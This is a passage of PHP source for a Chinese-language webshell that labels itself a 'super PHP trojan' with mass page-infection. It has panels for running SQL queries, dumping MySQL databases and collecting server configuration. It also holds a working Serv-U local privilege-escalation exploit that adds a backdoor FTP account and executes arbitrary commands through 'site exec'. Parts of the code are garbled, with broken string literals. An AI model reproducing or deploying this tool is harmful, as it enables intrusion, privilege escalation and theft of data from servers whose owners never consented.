$tb->tableheader();
$tb->formheader($action,'执行 SQL 语句');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
$tb->makehidden('do','query');
$tb->formfooter('1','30');
}//end sql query
elseif ($_GET['action'] == "sqlbak") {
$action = '?action=sqlbak';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$tb->tableheader();
$tb->formheader($action,'备份 MySQL 数据库');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
$tables = @mysql_list_tables($dbname);
while ($table = @mysql_fetch_row($tables)) {
$cachetables[$table[0]] = $table[0];
}
@mysql_free_result($tables);
if (empty($cachetables)) {
$tb->tdbody('您没有连接数据库 or 当前数据库没有任何数据表');
} else {
$tb->tdbody('
请选择表: | '.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).' |
备份数据所保存的路径: | '.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').' |
直接下载到本地 (适合数据量较小的数据库) |
$tb->makehidden('do','backupmysql');
$tb->formfooter('0','30');
}
$tb->tablefooter();
@mysql_close();
}//end sql backup
elseif ($_GET['action'] == "phpenv") {
$user = " 以免crush点此获取当前进程用户名 ";
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","
",$dis_func);
$dis_func = str_replace(",","
",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
0 => array("当前php进程用户",$user),
1 => array("服务器操作系统",PHP_OS),
2 => array("服务器时间",date("Y年m月d日 h:i:s",time())),
3 => array("服务器域名","".$_SERVER['SERVER_NAME'].""),
4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
7 => array("Web服务端口",$_SERVER['SERVER_PORT']),
8 => array("
HP运行方式",strtoupper(php_sapi_name())),
9 => array("
HP版本",PHP_VERSION),
10 => array("运行于安全模式",getphpcfg("safemode")),
11 => array("服务器管理员",$adminmail),
12 => array("本文件路径",__FILE__),
13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),
14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),
15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),
16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),
17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),
19 => array("
OST最大字节数 post_max_size",getphpcfg("post_max_size")),
20 => array("允许最大上传文件 upload_max_filesize",$upsize),
21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),
22 => array("被禁用的函数 disable_functions",$dis_func),
23 => array("phpinfo()",$phpinfo),
24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
25 => array("图形处理 GD Library",getfun("imageline")),
26 => array("IMAP电子邮件系统",getfun("imap_close")),
27 => array("MySQL数据库",getfun("mysql_close")),
28 => array("SyBase数据库",getfun("sybase_close")),
29 => array("Oracle数据库",getfun("ora_close")),
30 => array("Oracle 8 数据库",getfun("OCILogOff")),
31 => array("PREL相容语法 PCRE",getfun("preg_match")),
32 => array("PDF文档支持",getfun("pdf_close")),
33 => array("Postgre SQL数据库",getfun("pg_close")),
34 => array("SNMP网络管理协议",getfun("snmpget")),
35 => array("压缩文件支持(Zlib)",getfun("gzclose")),
36 => array("XML解析",getfun("xml_set_object")),
37 => array("FTP",getfun("ftp_login")),
38 => array("ODBC数据库连接",getfun("odbc_close")),
39 => array("Session支持",getfun("session_start")),
40 => array("Socket支持",getfun("fsockopen")),
);
$tb->tableheader();
echo "
\n";$tb->tdbody('查看PHP配置参数状况','left','1','30','style="padding-left: 5px;"');
$tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');
$tb->makehidden('do','viewphpvar');
echo "
\n";$hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');
for ($a=0;$a<3;$a++) {
$tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"');
?>
if ($a==0) {
for($i=0;$i<=12;$i++) {
echo "
".$info[$i][0]."".$info[$i][1]."\n";}
} elseif ($a == 1) {
for ($i=13;$i<=24;$i++) {
echo "
".$info[$i][0]."".$info[$i][1]."\n";}
} elseif ($a == 2) {
for ($i=25;$i<=40;$i++) {
echo "
".$info[$i][0]."".$info[$i][1]."\n";}
}
?>
}//for
echo "";
}//end phpenv
elseif($_GET['action'] == "SUExp")
{
if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "" && $_POST['SUCommand'])
{
echo "
"; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n". "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n". "-TZOEnable=0\r\n". " TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n". "-IP=0.0.0.0\r\n". "-PortNo=2121\r\n". "-User=Will_Be\r\n". "-Password=Will_Be\r\n". "-HomeDir=c:\\\r\n". "-LoginMesFile=\r\n". "-Disable=0\r\n". "-RelPaths=1\r\n". "-NeedSecure=0\r\n". "-HideHidden=0\r\n". "-AlwaysAllowLogin=0\r\n". "-ChangePassword=0\r\n". "-QuotaEnable=0\r\n". "-MaxUsersLoginPerIP=-1\r\n". "-SpeedLimitUp=0\r\n". "-SpeedLimitDown=0\r\n". "-MaxNrUsers=-1\r\n". "-IdleTimeOut=600\r\n". "-SessionTimeOut=-1\r\n". "-Expire=0\r\n". "-RatioUp=1\r\n". "-RatioDown=1\r\n". "-RatiosCredit=0\r\n". "-QuotaCurrent=0\r\n". "-QuotaMaximum=0\r\n". "-Maintenance=None\r\n". "-PasswordType=Regular\r\n". "-Ratios=None\r\n". " Access=c:\\|RELP\r\n"; $deldomain="-DELETEDOMAIN\r\n". "-IP=0.0.0.0\r\n". " PortNo=2121\r\n"; $sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf $sendbuf = "SITE MAINTENANCE\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf $sendbuf = $domain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf $sendbuf = $adduser; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf echo "********************************************************** echo "Starting Exploit ... echo "********************************************************** $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10); $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf $sendbuf = "USER Will_Be\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf $sendbuf = "PASS Will_Be\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: site exec ".$_POST["SUCommand"]." $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf echo "********************************************************** echo "Starting Delete Domain ... echo "********************************************************** $sendbuf = $deldomain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf echo " |
fclose($sock);
fclose($exp);
}
?>
通过Serv-U 本地管理员帐号执行命令 |
LocalPort: LocalUser: LocalPass: Command : |
}
?>
超级PHP木马带批量挂马. | <?php debuginfo(); ob_end_flush(); ?> |